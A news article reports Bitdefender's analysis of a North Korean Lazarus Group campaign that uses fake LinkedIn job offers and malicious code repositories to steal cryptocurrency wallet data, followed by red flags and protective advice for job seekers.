LinkedIn has emerged as a lucrative hunting ground for cyber criminals in recent years, with threat actors conducting a range of social engineering campaigns centered around fake job offers.
Last year, security company Clear Sky revealed a social engineering campaign using fraudulent LinkedIn identities to trick users into downloading malware with these job offers, for example.
Led by an Iranian threat group, this particular campaign built on techniques first observed being employed by the North Korean Lazarus group.
Now, fresh details on the extent of the threat posed by the Lazarus group have been revealed by Bitdefender Labs. A report from the cybersecurity firm details how one scammer approached a researcher who was able to record the tactics employed in the threat campaign.
The scammer first approached the researcher with an ‘opportunity’ to work on a decentralized cryptocurrency exchange, claiming the final minimal viable product (MVP) was already complete and they would be employed as a front-end developer.
Bitdefender reported that once the target expressed interest in the vacancy, the scammer requested they provide a CV or personal GitHub repository link, which it said could be used to harvest personal data as well as make the offer appear genuine.
After these are supplied, the attacker shares a repository with the MVP or the project as well as a feedback document labelled ‘Candidate Evaluation and Feedback For’, which includes questions that cannot be answered unless the target runs the demo.
Analysis of the heavily obfuscated code revealed that it dynamically loads malicious code from a third-party endpoint. Bitdefender found that the payload is a cross-platform info-stealer engineered to target a range of popular cryptocurrency wallets.
The next payload drops further dependencies designed to ensure persistence on the target system, establish command and control (C2), and avoid detection.
Bitdefender said its analysis of the malware and operational tactics employed by the attacker indicated the attack was part of a larger campaign carried out by the Lazarus Group, a state-sponsored threat actor based in North Korea.
The attackers’ objectives extend beyond data theft, the report claimed, stating the group has been observed targeting victims working in sensitive sectors such as aviation, defense, and nuclear industries with the aim of exfiltrating classified information, proprietary technology, and corporate credentials.
The group have also been recorded targeting enterprises with fake job seeker scams, where hackers posing as remote IT workers based in other parts of the world try to gain entry to businesses in order to establish persistence on their corporate network.
How to protect yourself on LinkedIn
As a professional network, it’s not out of the ordinary to receive job offers via LinkedIn. The platform has an in-built jobs board, allowing enterprises to post vacant positions.
However, when approached by an individual, it’s wise to remain vigilant and be wary of any telltale signs that you may be prey for a cyber criminal.
Bitdefender set out a series of red flags individuals can look out for, including offers with vague descriptions of the role that do not correspond to an existing job posting on the platform.
Suspicious repositories that belong to users with ‘random names’ and lack proper documentation or a long contribution history are also strong indicators that the sender has malicious intentions.
Finally, users should also look out for spelling errors in any correspondence they have with the suspected scammer, as well as evidence of poor communication such as refusing to provide alternative contact methods.
There are also best practices Bitdefender recommends users can follow to minimize the risk they face of falling for similar scams, such as never running unverified code outside of virtual machines, sandboxes, or online code testing platforms.
MORE FROM ITPRO
Source link
-
-
-
-
-
-
-
-
